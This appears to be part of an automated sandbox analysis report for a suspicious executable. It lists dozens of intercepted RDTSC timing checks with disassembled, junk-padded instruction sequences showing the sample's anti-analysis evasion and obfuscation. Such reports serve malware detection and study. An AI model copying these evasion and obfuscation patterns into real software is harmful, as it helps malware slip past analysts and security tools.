Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C42304 second address: C4230C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4230C second address: C4231B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCB0ED65F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C425DC second address: C425FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C425FA second address: C425FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C494C7 second address: C494E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C07B3D second address: C07B46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C274 second address: C4C27B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C3CB second address: C4C3DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C3DA second address: C4C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBCB0E4CF72h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FBCB0E4CF6Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C3F2 second address: C4C3F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C55E second address: C4C5B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF70h 0x00000007 push edi 0x00000008 jo 00007FBCB0E4CF66h 0x0000000e jc 00007FBCB0E4CF66h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jno 00007FBCB0E4CF68h 0x0000001e jl 00007FBCB0E4CF7Bh 0x00000024 jmp 00007FBCB0E4CF75h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FBCB0E4CF71h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C5B7 second address: C4C5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C5BB second address: C4C5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC2D second address: C4CC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC31 second address: C4CC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FBCB0E4CF66h 0x0000000f jns 00007FBCB0E4CF66h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FBCB0E4CF66h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC55 second address: C4CC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC59 second address: C4CC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF75h 0x00000007 jmp 00007FBCB0E4CF6Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FBCB0E4CF6Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC90 second address: C4CC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50544 second address: C50549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5062A second address: C5062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5062E second address: C50634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50D04 second address: C50D0E instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCB0ED65FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50EF7 second address: C50EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50EFB second address: C50EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5101A second address: C51031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCB0E4CF72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C510ED second address: C510F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51722 second address: C51726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51726 second address: C5172A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5172A second address: C51730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51730 second address: C51773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c cld 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+129C3805h] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+12B44B68h], ecx 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBCB0ED6600h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51773 second address: C51793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51793 second address: C51797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51797 second address: C5179B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C52156 second address: C52161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBCB0ED65F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C52161 second address: C521D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 and esi, 6D69B6AFh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FBCB0E4CF68h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a xor edi, 036BB1E2h 0x00000030 push 00000000h 0x00000032 jne 00007FBCB0E4CF6Ch 0x00000038 xchg eax, ebx 0x00000039 push edi 0x0000003a pushad 0x0000003b jno 00007FBCB0E4CF66h 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 popad 0x00000044 pop edi 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 jmp 00007FBCB0E4CF78h 0x0000004e pop ecx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C53287 second address: C53297 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBCB0ED65F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C53D94 second address: C53DAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jng 00007FBCB0E4CF7Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCB0E4CF6Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C53DAF second address: C53DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C54842 second address: C548B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBCB0E4CF79h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FBCB0E4CF68h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 or dword ptr [ebp+12B42CD1h], ebx 0x0000002b push 00000000h 0x0000002d movsx edi, ax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FBCB0E4CF68h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 ja 00007FBCB0E4CF66h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C548B4 second address: C548C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C55B8E second address: C55B98 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C568C7 second address: C568D1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBCB0ED65FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C568D1 second address: C56941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FBCB0E4CF68h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+129C378Dh] 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+129C1945h], edi 0x0000002f or si, 3C35h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007FBCB0E4CF68h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov dword ptr [ebp+129C1B9Ah], edx 0x00000056 push eax 0x00000057 pushad 0x00000058 push edx 0x00000059 jnc 00007FBCB0E4CF66h 0x0000005f pop edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push edi 0x00000063 pop edi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C58424 second address: C58431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C56659 second address: C5665E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C570BE second address: C570D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C570D4 second address: C570DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5A4C9 second address: C5A506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jne 00007FBCB0ED65F8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCB0ED6605h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5A506 second address: C5A554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FBCB0E4CF68h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 movsx ebx, di 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e xor dword ptr [ebp+129C1A30h], eax 0x00000034 xchg eax, esi 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007FBCB0E4CF66h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5C451 second address: C5C456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5C456 second address: C5C45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C59642 second address: C59648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5E397 second address: C5E39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5E39B second address: C5E39F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5E39F second address: C5E3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+129C3625h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBCB0E4CF68h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d add ebx, dword ptr [ebp+129C2B2Bh] 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5A6F7 second address: C5A7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FBCB0ED65F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f xor ebx, 4B9F7D77h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov bx, ax 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FBCB0ED65F8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jmp 00007FBCB0ED65FEh 0x00000045 mov eax, dword ptr [ebp+129C0EE5h] 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007FBCB0ED65F8h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 00000018h 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 movsx ebx, bx 0x00000068 push FFFFFFFFh 0x0000006a cmc 0x0000006b nop 0x0000006c jg 00007FBCB0ED65FCh 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 jmp 00007FBCB0ED65FEh 0x0000007b jmp 00007FBCB0ED65FBh 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4D3 second address: C5D4D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4D7 second address: C5D4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4E9 second address: C5D4ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4ED second address: C5D4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4F3 second address: C5D4FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F325 second address: C5F329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C602C0 second address: C602C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C602C4 second address: C602C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C602C8 second address: C60306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007FBCB0E4CF75h 0x0000000f cld 0x00000010 pop ebx 0x00000011 push 00000000h 0x00000013 sub bx, 2F0Ch 0x00000018 push 00000000h 0x0000001a xor dword ptr [ebp+129C1891h], edi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBCB0E4CF6Bh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C60306 second address: C6030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6030B second address: C60311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F470 second address: C5F474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F474 second address: C5F478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F478 second address: C5F486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C612A2 second address: C612A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C612A6 second address: C612AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6240E second address: C62418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C65F5F second address: C65F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C65F63 second address: C65F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C650D5 second address: C6515B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007FBCB0ED6609h 0x00000011 popad 0x00000012 jng 00007FBCB0ED65FCh 0x00000018 jc 00007FBCB0ED65F6h 0x0000001e popad 0x0000001f nop 0x00000020 sbb bh, FFFFFFC6h 0x00000023 push dword ptr fs:[00000000h] 0x0000002a mov edi, edx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov dword ptr [ebp+129C295Ch], edx 0x00000039 mov eax, dword ptr [ebp+129C1205h] 0x0000003f mov edi, 2C57C60Ah 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FBCB0ED65F8h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000018h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 mov dword ptr [ebp+129C1A95h], esi 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6515B second address: C65170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF70h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C66127 second address: C6612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
